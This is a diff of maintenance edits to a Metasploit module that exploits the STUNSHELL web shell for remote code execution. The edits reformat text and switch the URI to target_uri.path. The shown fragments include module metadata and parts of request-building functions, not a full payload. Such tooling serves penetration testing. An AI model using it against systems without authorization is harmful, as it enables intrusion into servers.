@@ -16,14 +16,14 @@ def initialize(info={})
16
16
super ( update_info ( info ,
17
17
'Name' => 'STUNSHELL Web Shell Remote Code Execution' ,
18
18
'Description' => %q{
19
- This module exploits unauthenticated versions of the "STUNSHELL" web shell. This
20
- module works when safe mode is disabled on the web server. This shell is widely
21
- used in automated RFI payloads.
19
+ This module exploits unauthenticated versions of the "STUNSHELL" web shell.
20
+ This module works when safe mode is disabled on the web server. This shell is
21
+ widely used in automated RFI payloads.
22
22
} ,
23
23
'License' => MSF_LICENSE ,
24
24
'Author' =>
25
25
[
26
- 'bwall <bwall[at]openbwall.com>' , # vuln discovery & msf module
26
+ 'bwall <bwall[at]openbwall.com>' # vuln discovery & msf module
27
27
] ,
28
28
'References' =>
29
29
[
@@ -43,7 +43,7 @@ module works when safe mode is disabled on the web server. This shell is widely
43
43
} ,
44
44
'Platform' => [ 'unix' , 'win' ] ,
45
45
'Arch' => ARCH_CMD ,
46
- 'Targets' =>
46
+ 'Targets' =>
47
47
[
48
48
[ 'stunshell / Unix' , { 'Platform' => 'unix' } ] ,
49
49
[ 'stunshell / Windows' , { 'Platform' => 'win' } ]
@@ -58,7 +58,7 @@ module works when safe mode is disabled on the web server. This shell is widely
58
58
end
59
59
60
60
def check
61
- uri = normalize_uri ( datastore [ 'URI' ] )
61
+ uri = normalize_uri ( target_uri . path . to_s )
62
62
request_parameters = {
63
63
'method' => 'POST' ,
64
64
'uri' => uri ,
@@ -75,7 +75,7 @@ def check
75
75
end
76
76
77
77
def http_send_command ( cmd )
78
- uri = normalize_uri ( datastore [ 'URI' ] )
78
+ uri = normalize_uri ( target_uri . path . to_s )
79
79
request_parameters = {
80
80
'method' => 'POST' ,
81
81
'uri' => uri ,
0 commit comments